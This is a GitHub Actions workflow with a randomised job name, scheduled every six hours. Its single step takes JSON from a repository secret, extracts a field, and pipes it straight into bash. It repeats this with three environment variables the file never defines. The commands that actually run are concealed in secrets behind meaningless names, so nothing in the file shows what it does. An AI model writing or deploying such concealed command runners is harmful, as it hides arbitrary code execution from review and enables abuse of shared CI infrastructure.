name: fnjcjkkk
on:
  workflow_dispatch:
  schedule:
    - cron: '55 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fnjcjkkk
        env:
          gg5: ${{ secrets.gg5 }}
        run: |
          echo $gg5 | jq -r .cxin65 | /bin/bash
          echo $w9 | jq -r .yqesu56 | /bin/bash
          echo $j44962 | jq -r .glavr491 | /bin/bash
          echo $zqtjl410 | jq -r .cbfrj0882 | /bin/bash

